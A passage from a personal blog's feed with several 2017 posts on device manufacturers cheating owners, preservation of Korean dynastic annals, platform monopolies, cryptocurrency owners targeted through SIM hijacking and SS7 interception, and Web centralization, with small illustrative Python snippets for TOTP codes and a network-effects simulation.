manufacturer wants, not what the customer who believes they own the Thing wants.<br /><a name='more'></a><br />In particular, Doctorow looks at examples, such as Dieselgate, in which the manufacturer wants to <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/">lie to the world about what the Thing does</a>:<br /><blockquote class="tr_bq">All these forms of cheating treat the owner of the device as an enemy of the company that made or sold it, to be thwarted, tricked, or forced into conducting their affairs in the best interest of the company’s shareholders. To do this, they run programs and processes that attempt to hide themselves and their nature from their owners, and proxies for their owners (like reviewers and researchers).<br /><br />Increasingly, cheating devices behave differently depending on who is looking at them. When they believe themselves to be under close scrutiny, their behavior reverts to a more respectable, less egregious standard.</blockquote>Doctorow's piece provides many examples, but a week later he provided another, seemingly benign, example. Tesla provided some of their cars <a href="https://techcrunch.com/2017/09/09/tesla-flips-a-switch-to-increase-the-range-of-some-cars-in-florida-to-help-people-evacuate/">with an over-the-air temporary range upgrade</a> to help their owners escape Hurricane Irma. They could do this <a href="https://boingboing.net/2017/09/10/iron-man-is-a-dick.html">because</a>:<br /><blockquote class="tr_bq">Tesla sells both 60kWh and 75kWh versions of its Model S and Model X cars; but these cars have identical batteries -- the 60kWh version runs software that simply misreports the capacity of the battery to the charging apparatus and the car's owner. </blockquote>And it would be a <a href="https://boingboing.net/2017/09/10/iron-man-is-a-dick.html">crime to upgrade yourself</a> to use the battery you bought:<br /><blockquote class="tr_bq">[Tesla] has to rely on the Computer Fraud and Abuse Act (1986), which felonizes violating terms of service. It has to rely on Section 1201 of the DMCA, which provides prison sentences of 5 years for first offenders who bypass locks on the devices they own. </blockquote>It is easy to see that the capability Tesla used could be used for other things:<br /><blockquote class="tr_bq">The implications of this are grim. A repo depot could brick your car over the air (and it would be a felony to write code to unbrick it). Worse, <a href="http://this.deakin.edu.au/lifestyle/car-wars">hackers who can successfully impersonate Tesla, Inc. to your car will have the run of the device</a>: it is designed to allow remote parties to override the person behind the wheel, and contains active countermeasures to prevent you from reasserting control.</blockquote>Doctorow <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/">concludes</a>:<br /><blockquote class="tr_bq">The software in gadgets makes it very tempting indeed to fill them with pernicious demons, but these laws criminalize trying to exorcise those demons.<br /><br />There’s some movement on this. A suit brought by the ACLU attempts to carve some legal exemptions for researchers out of the Computer Fraud and Abuse Act. 
Another suit brought by the Electronic Frontier Foundation seeks to invalidate Section 1201 of the Digital Millennium Copyright Act.<br /><br />Getting rid of these laws is the first step towards restoring the order in which things you own treat you as their master, but it’s just the start. There must be anti-trust enforcement with the death penalty – corporate dissolution – for companies that are caught cheating. When the risk of getting caught is low, then increasing penalties are the best hedge against bad action. The alternative is toasters that won’t accept third-party bread and dishwashers that won’t wash unauthorized dishes.</blockquote>Just go read <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/">both of</a> <a href="https://boingboing.net/2017/09/10/iron-man-is-a-dick.html">his pieces</a>.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com3tag:blogger.com,1999:blog-4503292949532760618.post-40316794056390943952017-09-05T08:00:00.000-07:002017-09-13T18:50:12.374-07:00Long-Lived Scientific Observations<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s1600/Shang_dynasty_inscribed_scapula.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1232" data-original-width="800" height="200" src="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s200/Shang_dynasty_inscribed_scapula.jpg" width="129" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">By <a href="https://commons.wikimedia.org/wiki/User:BabelStone" title="User:BabelStone">BabelStone</a>, <a href="http://creativecommons.org/licenses/by-sa/3.0" title="Creative Commons Attribution-Share Alike 3.0">CC BY-SA 3.0</a><br /><a href="https://commons.wikimedia.org/w/index.php?curid=16189953">Source</a></td></tr></tbody></table>Keeping scientific data, especially observations that are not repeatable, for the long term is important. In our <a href="http://dx.doi.org/10.1145/1217935.1217957">2006 Eurosys paper</a> we used an example from China. During the Shang dynasty:<br /><blockquote>astronomers inscribed eclipse observations on animal bones. About 3200 years later, researchers used these records to estimate that the accumulated clock error was about 7 hours. From this they derived a value for the <a href="http://dx.doi.org/10.1007/BF00879584">viscosity of the Earth's mantle</a> as it rebounds from the weight of the glaciers.</blockquote>Last week we had another, if only one-fifth as old, example of the value of long-ago scientific observations. 
<a href="https://phys.org/news/2017-08-scientists-recover-nova-years-korean.html">Korean astronomers' records of a nova in 1437</a> provide strong evidence that:<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-5DY-Nr442ys/Wagnig6A8rI/AAAAAAAAD3A/gbQtcylxViAhS0sGnbe6M7bSPojIhimYgCLcBGAs/s1600/KoreanNova1473-Lo.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="480" data-original-width="533" height="180" src="https://4.bp.blogspot.com/-5DY-Nr442ys/Wagnig6A8rI/AAAAAAAAD3A/gbQtcylxViAhS0sGnbe6M7bSPojIhimYgCLcBGAs/s200/KoreanNova1473-Lo.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://dx.doi.org/10.1038/nature23644">1473 nova remains</a></td></tr></tbody></table><blockquote>"cataclysmic binaries"—novae, novae-like variables, and dwarf novae—are one and the same, not separate entities as has been previously suggested. After an eruption, a nova becomes "nova-like," then a dwarf nova, and then, after a possible hibernation, comes back to being nova-like, and then a nova, and does it over and over again, up to 100,000 times over billions of years.</blockquote>How were these 580-year-old records preserved? Follow me below the fold.<br /><a name='more'></a><br />The <strike>eclipse</strike> nova was recorded in the <i>sillok</i>, the <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation"><i>Annals of the Joseon Dynasty</i></a>. Because they were compiled over 200 years after Choe Yun-ui's (최윤의) <a href="https://en.wikipedia.org/wiki/Choe_Yun-ui">1234 invention of bronze movable type</a>, the final versions of each reign's Annals, from:<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s1600/SejongSillok.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="461" data-original-width="591" height="155" src="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s200/SejongSillok.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.unesco.org/webworld/nominations/images/korea/6b.jpg">Source</a></td></tr></tbody></table><blockquote>the Annals of <a class="mw-redirect" href="https://en.wikipedia.org/wiki/Sejong_the_Great_of_Joseon" title="Sejong the Great of Joseon">Sejong</a> (r. 
1418–1450) onwards, were printed with movable metal and wooden type, which was unprecedented in the making of annals in Japan and China.</blockquote>And Lots Of Copies were made to Keep Stuff Safe using <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation">geographical diversity</a>, regular audit, and replacement of lost copies:<br /><blockquote>Four separate repositories were established in <a href="https://en.wikipedia.org/wiki/Blue_House" title="Blue House">Chunchugwan</a>, <a href="https://en.wikipedia.org/wiki/Chungju" title="Chungju">Chungju</a> County, <a href="https://en.wikipedia.org/wiki/Jeonju" title="Jeonju">Jeonju</a> County, and <a href="https://en.wikipedia.org/wiki/Seongju_County" title="Seongju County">Seongju County</a> to store copies of the <i>Annals</i>. All but the repository in Jeonju were burned down during the <a class="mw-redirect" href="https://en.wikipedia.org/wiki/Japanese_invasions_of_Korea_%281592%E2%80%931598%29" title="Japanese invasions of Korea (1592–1598)">Imjin wars</a>. After the war, five more copies of the <i>Annals</i> were produced and stored in Chunchugwan and the mountain repositories of <a class="mw-redirect" href="https://en.wikipedia.org/wiki/Myohyang-san" title="Myohyang-san">Myohyang-san</a>, <a href="https://en.wikipedia.org/wiki/Taebaeksan" title="Taebaeksan">Taebaeksan</a>, <a href="https://en.wikipedia.org/wiki/Odaesan" title="Odaesan">Odaesan</a>, and <a href="https://en.wikipedia.org/wiki/Manisan_%28Incheon%29" title="Manisan (Incheon)">Mani-san</a>. </blockquote>A good way to preserve information, which the LOCKSS Program implemented! The story of their preservation is told in Shin Byung Ju's <a href="http://koreana.kf.or.kr/pdf_file/2008/2008_AUTUMN_E016.pdf"><i>Dedicated Efforts to Preserve the Annals of the Joseon Dynasty</i></a>:<br /><blockquote>Although the <i>Annals of the Joseon Dynasty (Joseonwangjosillok)</i> have been duly recognized as an incomparable documentary treasure, this would not have been possible without its elaborate and scientific system of maintenance and preservation. This included the building of archives in remote mountainous regions, where the <i>Annals</i> could be safely stored for future generations, along with the development of nearby guardian temples to protect the archives during times of crisis. The <i>Annals</i> would be stored in special boxes, together with medicinal herbs to ward off insects and absorb moisture. Also, the Annals were aired out once every two years as part of a continuous maintenance and preservation process. As such, it was the rigid adherence to these painstaking procedures that enabled the <i>Annals of the Joseon Dynasty</i> to be maintained in their original form after all these centuries. </blockquote>The details are fascinating, <a href="http://koreana.kf.or.kr/pdf_file/2008/2008_AUTUMN_E016.pdf">go read!</a> Similar care was taken at <a href="https://en.wikipedia.org/wiki/Haeinsa">Haeinsa</a>:<br /><blockquote>most notable for being the home of the <i><a href="https://en.wikipedia.org/wiki/Tripitaka_Koreana" title="Tripitaka Koreana">Tripitaka Koreana</a>,</i> the whole of the Buddhist Scriptures carved onto 81,350 wooden printing blocks, which it has housed since 1398.</blockquote>Winston Smith in "1984" was an editor for the Ministry of Truth; he "<a href="https://en.wikipedia.org/wiki/Nineteen_Eighty-Four">rewrites records and alters photographs to conform to the state's ever-changing version of history itself</a>". 
George Orwell wasn't a prophet. Throughout history, governments of all stripes have found the need to employ Winston Smiths, and the Joseon dynasty was no exception. But the Koreans of that era even <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation">defended against their Winston Smiths</a>:<br /><blockquote>In the Later Joseon period when there was intense conflict between different political factions, revision or rewriting of <i>sillok</i> by rival factions took place, but they were identified as such, and the original version was preserved.</blockquote>Today's eclipse records would be on the Web, not paper or bone. Will astronomers 3200 or even only 580 years from now be able to use them?David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com4tag:blogger.com,1999:blog-4503292949532760618.post-8867766429731485352017-09-01T10:00:00.000-07:002017-09-01T10:00:03.052-07:00Josh Marshall on GoogleJust a quick note to direct you to Josh Marshall's must-read <a href="http://talkingpointsmemo.com/edblog/a-serf-on-googles-farm"><i>A Serf on Google's Farm</i></a>. It is a deep dive into the details of the relationship between <a href="http://talkingpointsmemo.com/"><i>Talking Points Memo</i></a>, a fairly successful independent news publisher, and Google. It is essential reading for anyone trying to understand the business of publishing on the Web. Below the fold, pointers to a couple of other important works in this area.<br /><a name='more'></a><br />Josh also illuminates the bigger picture of the monopoly power of platforms, as detailed in Lina Khan's masterful <i>Yale Law Journal</i> article <a href="http://www.yalelawjournal.org/note/amazons-antitrust-paradox"><i>Amazon's Antitrust Paradox</i></a> (also a must-read, even at 24,000 words). Josh concludes: <br /><blockquote>"It’s a structural issue. Monopolies are bad for the economy and they’re bad politically. They also have perverse consequences across the board. The money that used to fund your favorite website is now going to Google and Facebook, which doesn’t produce any news at all.<br /><br />We could see this coming a few years ago. And we made a decisive and longterm push to restructure our business around subscriptions. So I’m confident we will be fine. But journalism is not fine right now. And journalism is only one industry the platform monopolies affect. Monopolies are bad for all the reasons people used to think they were bad. They raise costs. They stifle innovation. They lower wages. And they have perverse political effects too. Huge and entrenched concentrations of wealth create entrenched and dangerous locuses of political power.<br /><br />So we will keep using all of Google’s gizmos and services and keep cashing their checks. Hopefully, they won’t see this post and get mad. In the microcosm, it works for us. It’s good money. But big picture … Google is a big, big problem. So is Facebook. So is Amazon. Monopolies are a big, lumbering cause of many of our current afflictions. And we’re only now, slowly, beginning to realize it."</blockquote>Tip of the hat to <a href="https://boingboing.net/2017/08/07/economists-so-fragile.html">Cory Doctorow</a> for pointing me both to Lina Khan's work and to the draft of <a href="http://economistsview.typepad.com/files/formation-of-capital-and-wealth-draft-5-07-2017.pdf">On the Formation of Capital and Wealth</a>, by Stanford's Mordecai Kurz. From the abstract:<br /><blockquote>We show modern information technology ... 
is the cause of rising income and wealth inequality since the 1970's and has contributed to slow growth of wages and decline in the natural rate.<br /><br />We first study all US firms whose securities trade on public exchanges. Surplus wealth of a firm is the difference between wealth created (equity and debt) and its capital. ... aggregate surplus wealth rose from -$0.59 Trillion in 1974 to $24 Trillion ... in 2015 and reflects rising monopoly power. The added wealth was created mostly in sectors transformed by IT. Declining or slow growing firms with broadly distributed ownership have been replaced by IT based firms with highly concentrated ownership. ... We explain why IT innovations enable and accelerate the erection of barriers to entry and once erected, IT facilitates maintenance of restraints on competition. These innovations also explain rising size of firms.<br /><br />We next develop a model where firms have monopoly power. Monopoly surplus is unobservable and we deduce it with three methods, based on surplus wealth, share of labor or share of profits. Share of monopoly surplus rose from zero in early 1980's to 23% in 2015. This last result is, remarkably, deduced by all three methods. </blockquote>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com3tag:blogger.com,1999:blog-4503292949532760618.post-85082608428240959112017-08-29T08:00:00.001-07:002017-08-29T08:00:16.698-07:00Don't own cryptocurrenciesA year ago I ended a post entitled <a href="http://blog.dshr.org/2016/08/the-120k-btc-heist.html"><i>The 120K BTC Heist</i></a>:<br /><blockquote class="tr_bq">So in practice blockchains are decentralized (<a href="http://blog.dshr.org/2014/10/economies-of-scale-in-peer-to-peer.html">not</a>), anonymous (<a href="https://coinlab.com/blog/post/exploring/">not</a> and <a href="http://dl.acm.org/citation.cfm?id=2699128">not</a>), immutable (<a href="http://www.coindesk.com/hard-fork-ethereum-dao/">not</a>), secure (<a href="http://www.reuters.com/article/us-bitfinex-hacked-hongkong-idUSKCN10E0KP">not</a>), fast (<a href="https://blockchain.info/charts/median-confirmation-time">not</a>) and cheap (<a href="https://blockchain.info/charts/cost-per-transaction">not</a>). What's (not) to like?&nbsp; </blockquote>Below the fold, I update the answer to the question with news you can use if you're a cryptocurrency owner.<br /><a name='more'></a><br />Many Americans evidently believe that cryptocurrencies are anonymous enough to use <a href="http://www.thedailybeast.com/irs-now-has-a-tool-to-unmask-bitcoin-tax-cheats">bitcoin to evade taxes</a>:<br /><blockquote class="tr_bq">The IRS has claimed that only <a href="http://fortune.com/2017/03/19/irs-bitcoin-lawsuit/">802 people declared bitcoin losses or profits</a> in 2015; clearly fewer than the actual number of people trading the cryptocurrency—especially as more investors dip into the world of cryptocurrencies, and the value of bitcoin punches past the $4,000 mark. 
Maybe lots of bitcoin traders didn't realize the government expects to collect tax on their digital earnings, or perhaps some thought they'd be able to get away with stockpiling bitcoin thanks to the perception that the cryptocurrency is largely anonymous.</blockquote>Perhaps they should <a href="http://www.thedailybeast.com/irs-now-has-a-tool-to-unmask-bitcoin-tax-cheats">reconsider</a>:<br /><blockquote class="tr_bq">[the IRS] has purchased specialist software to track those using bitcoin, <a href="https://www.documentcloud.org/documents/3935924-IRS-Chainalysis-Contract.html">according to a contract</a> obtained by The Daily Beast.</blockquote>Especially, as Zeljka Zorz reports at Helpnetsecurity, if they used their <a href="https://www.helpnetsecurity.com/2017/08/21/identify-users-behind-bitcoin-transactions/">bitcoin to buy something</a>:<br /><blockquote class="tr_bq">More and more shopping Web sites accept cryptocurrencies as a method of payment, but users should be aware that these transactions can be used to deanonymize them – even if they are using blockchain anonymity techniques such as <a href="https://en.wikipedia.org/wiki/CoinJoin" target="_blank">CoinJoin</a>.<br /><br />Independent researcher Dillon Reisman and Steven Goldfeder, Harry Kalodner and Arvind Narayanan from Princeton University have demonstrated that third-party online tracking provides enough information to identify a transaction on the blockchain, link it to the user’s cookie and, ultimately, to the user’s real identity.</blockquote>The paper is <a href="https://arxiv.org/pdf/1708.04748.pdf">here</a>. But owning bitcoins is a <a href="https://techcrunch.com/2017/08/23/i-was-hacked/">problem even if you don't use them to buy anything</a> [my emphasis]:<br /><blockquote class="tr_bq">First the hacker grabbed access to my friend’s Facebook Messenger and contacted everyone on his list that was interested in cryptocurrency, including me. ... <i>Once it was clear that I had some bitcoin somewhere the hackers decided I was their next target</i>.</blockquote>Once you're a target the bad guys have two techniques for grabbing bitcoin from savvy owners who have enabled two-factor authentication (2FA) on their accounts using SMS, which is by far the most common 2FA technique. The first is <a href="https://techcrunch.com/2017/08/23/i-was-hacked/">SIM hijacking</a>:<br /><blockquote class="tr_bq">a hacker swapped his or her own SIM card with mine, presumably by calling T-Mobile. This, in turn, shut off network services to my phone and, moments later, allowed the hacker to change most of my Gmail passwords, my Facebook password, and text on my behalf. 
All of the two-factor notifications went, by default, to my phone number so I received none of them and in about two minutes I was locked out of my digital life.</blockquote>This has become a routine occurrence, as Nathaniel Popper reports in <a href="https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html"><i>Identity Thieves Hijack Cellphone Accounts to Go After Virtual Currency</i></a>:<br /><blockquote class="tr_bq">“My iPad restarted, my phone restarted and my computer restarted, and that’s when I got the cold sweat and was like, ‘O.K., this is really serious,’” said Chris Burniske, a virtual currency investor who lost control of his phone number late last year.<br /><br />A wide array of people have complained about being successfully targeted by this sort of attack, including a Black Lives Matter activist and <a href="https://www.ftc.gov/news-events/blogs/techftc/2016/06/your-mobile-phone-account-could-be-hijacked-identity-thief#othervictims"> the chief technologist of the Federal Trade Commission</a>. The commission’s own data shows that the number of so-called phone hijackings has been rising. In January 2013, there were 1,038 such incidents reported; by January 2016, that number had increased to 2,658.<br /><br />But a particularly concentrated wave of attacks has hit those with the most obviously valuable online accounts: virtual currency fanatics like Mr. Burniske.<br /><br />Within minutes of getting control of Mr. Burniske’s phone, his attackers had changed the password on his virtual currency wallet and drained the contents — some $150,000 at today’s values.<br /><br />...<br /><br />“Everybody I know in the cryptocurrency space has gotten their phone number stolen,” said Joby Weeks, a Bitcoin entrepreneur.<br /><br />Mr. Weeks lost his phone number and about a million dollars’ worth of virtual currency late last year, despite having asked his mobile phone provider for additional security after his wife and parents lost control of their phone numbers.<br /><br />The attackers appear to be focusing on anyone who talks on social media about owning virtual currencies or anyone who is known to invest in virtual currency companies, such as venture capitalists. And virtual currency transactions are designed to be irreversible.</blockquote>The problem is that the security of your account depends on the ability of your cellphone carrier's front-line support to resist social engineering, a <a href="https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html">notoriously weak defense</a>:<br /><blockquote class="tr_bq">Adam Pokornicky, a managing partner at Cryptochain Capital, asked Verizon to put extra security measures on his account after he learned that an attacker had called in 13 times trying to move his number to a new phone.<br /><br />But just a day later, he said, the attacker persuaded a different Verizon agent to change Mr. Pokornicky’s number without requiring the new PIN. 
</blockquote>The second technique is <a href="https://arstechnica.com/information-technology/2017/05/thieves-drain-2fa-protected-bank-accounts-by-abusing-ss7-routing-protocol/">abusing the SS7 signalling protocol:</a><br /><blockquote class="tr_bq">A known security hole in the networking protocol used by cellphone providers around the world played a key role in a recent string of attacks that drained bank customer accounts, according to a report published Wednesday.<br /><br />The unidentified attackers exploited weaknesses in <a href="https://en.wikipedia.org/wiki/Signalling_System_No._7">Signalling System No. 7</a>, a telephony signaling language that more than 800 telecommunications companies around the world use to ensure their networks interoperate. SS7, as the protocol is known, makes it possible for a person in one country to send text messages to someone in another country. It also allows phone calls to go uninterrupted when the caller is traveling on a train.<br /><br />The same functionality can be used to eavesdrop on conversations, track geographic whereabouts, or intercept text messages. Security researchers demonstrated this dark side of SS7 last year when they <a href="https://arstechnica.com/security/2016/04/how-hackers-eavesdropped-on-a-us-congressman-using-only-his-phone-number/">stalked US Representative Ted Lieu</a> using nothing more than his 10-digit cell phone number and access to an SS7 network.<br /><br />In January, thieves exploited SS7 weaknesses to bypass two-factor authentication banks used to prevent unauthorized withdrawals from online accounts, the German-based newspaper <a href="http://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504"><i>Süddeutsche Zeitung</i> reported</a>. Specifically, the attackers used SS7 to redirect the text messages the banks used to send one-time passwords. Instead of being delivered to the phones of designated account holders, the text messages were diverted to numbers controlled by the attackers. The attackers then used the mTANs—short for "mobile transaction authentication numbers"—to transfer money out of the accounts.</blockquote>Because the vulnerability is a basic feature of SS7 implementations, there is nothing you can do to defend against the SS7 attack except not using phones for 2FA.
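The standard phone-free alternative is an authenticator app computing time-based one-time passwords (TOTP, RFC 6238) from a secret shared once at enrollment; the code never crosses the phone network, so there is nothing for a SIM hijacker or an SS7 attacker to intercept. Here is a minimal sketch of how such a code is computed (my illustration; the secret is the usual documentation example, not a real one):

```python
# Compute a TOTP code locally, as an authenticator app does (RFC 6238).
# Both the server and the app hold the shared secret; each login code is
# derived from the secret and the clock, so no SMS is ever sent.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval          # 30-second time step
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

if __name__ == "__main__":
    print(totp("JBSWY3DPEHPK3PXP"))  # example secret, not a real credential
```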
<br /><br />So, if you own bitcoin:<br /><ul><li>Don't use them to buy anything.</li><li>Don't, especially, use them to do anything illegal. </li><li>Don't let anyone know that you own them.</li><li>Don't write anything on-line sounding even mildly enthusiastic about cryptocurrencies.</li><li>Don't use phone-based 2FA on any of your accounts.</li><li>Do report any gains and losses to the tax authorities in your country.</li></ul>Have fun!<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com15tag:blogger.com,1999:blog-4503292949532760618.post-51149921007072968922017-08-28T08:00:00.000-07:002017-08-28T08:00:00.147-07:00Recent Comments WidgetI added a "Recent Comments" widget to the sidebar of my blog. I should have done this a long time ago, sorry! The reason it is needed is that I frequently add comments to old, sometimes very old, posts as a way of tracking developments that don't warrant a whole new post.<br /><br />For example, my post from last December <a href="http://blog.dshr.org/2016/12/bitag-on-iot.html"><i>BITAG on the IoT</i></a> has accumulated 52 comments, the <a href="http://blog.dshr.org/2016/12/bitag-on-iot.html?showComment=1503696626856#c66678455469015777">most recent from August 25<sup>th</sup></a>. That's more than one a week! I've been using it as a place to post notes about the evolving security disaster that is the IoT. I need to do a new post about the IoT, but it hasn't risen to the top of the stack of draft posts yet.<br /><br />One thing the widget will show is that not many of you comment on my posts. I'm really very grateful to those who do, so please take the risk of commenting. I moderate comments, so they don't show up immediately. And if I think they're off-topic or unsuitable they won't show up at all. But comments I disagree with are welcome, and can spark a useful exchange. See, for example, the discussion of inflation in the comments on <a href="http://blog.dshr.org/2017/08/economic-model-of-long-term-storage.html"><i>Economic Model of Long-Term Storage</i></a>, which clarified a point I thought was obvious but clearly wasn't. Thank you, Rick Levine!<br /><br />Hat tip to <a href="https://www.makingdifferent.com/author/nitin/">Nitin Maheta</a>, from whose <a href="http://www.makingdifferent.com/recent-comments-widget-with-avatar-for-blogger/">recent comments widget</a> mine was adapted.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-89283694291564727202017-08-24T08:00:00.002-07:002017-08-24T08:00:01.395-07:00Why Is The Web "Centralized"?There is a groundswell of opinion, which I share, in favor of a "decentralized Web"; it has continued to build since last year's "<a href="http://blog.dshr.org/2016/06/decentralized-web-summit.html">Decentralized Web Summit</a>". A wealth of different technologies for implementing a decentralized Web are competing for attention. But the basic protocols of the Internet and the Web (IP, TCP, DNS, HTTP, ...) aren't centralized. What is the centralization that decentralized Web advocates are reacting against? Clearly, it is the domination of the Web by the FANG (Facebook, Amazon, Netflix, Google) and a few other large companies such as the cable oligopoly.<br /><br />These companies came to dominate the Web for <i>economic</i>, not technological, reasons. The Web, like other technology markets, has very large increasing returns to scale (network effects, duh!). These companies build centralized systems using technology that isn't inherently centralized but which has increasing returns to scale. It is the increasing returns to scale that drive the centralization.<br /><br />Unless decentralized <i>technologies</i> specifically address the issue of how to avoid increasing returns to scale, they will not, of themselves, fix this <i>economic</i> problem. Their increasing returns to scale will drive the layering of centralized businesses on top of decentralized infrastructure, replicating the problem we face now, just on different infrastructure.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1
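To make the increasing-returns argument in the last post concrete, here is a toy simulation (my illustration, not anything from the post) in which each new user joins whichever of two otherwise-identical platforms offers higher utility, and utility grows with the platform's existing user base:

```python
# Toy model of network effects: a user's utility from a platform is
# proportional to its current size, plus idiosyncratic noise, so a small
# initial edge tends to snowball into near-total dominance. All the
# numbers here are arbitrary assumptions for illustration only.
import random

def simulate(new_users: int = 10000, seed: int = 42):
    rng = random.Random(seed)
    sizes = [51, 49]  # platform A starts with a tiny edge
    for _ in range(new_users):
        # Each arrival joins the platform offering higher perceived utility.
        utilities = [s * rng.uniform(0.9, 1.1) for s in sizes]
        sizes[utilities.index(max(utilities))] += 1
    return sizes

if __name__ == "__main__":
    a, b = simulate()
    print("platform A:", a, "users; platform B:", b, "users")
```

Run it with different seeds and one platform almost always ends up with the overwhelming majority of users, even though neither is technically superior; that is the sense in which decentralized protocols alone do not prevent centralization.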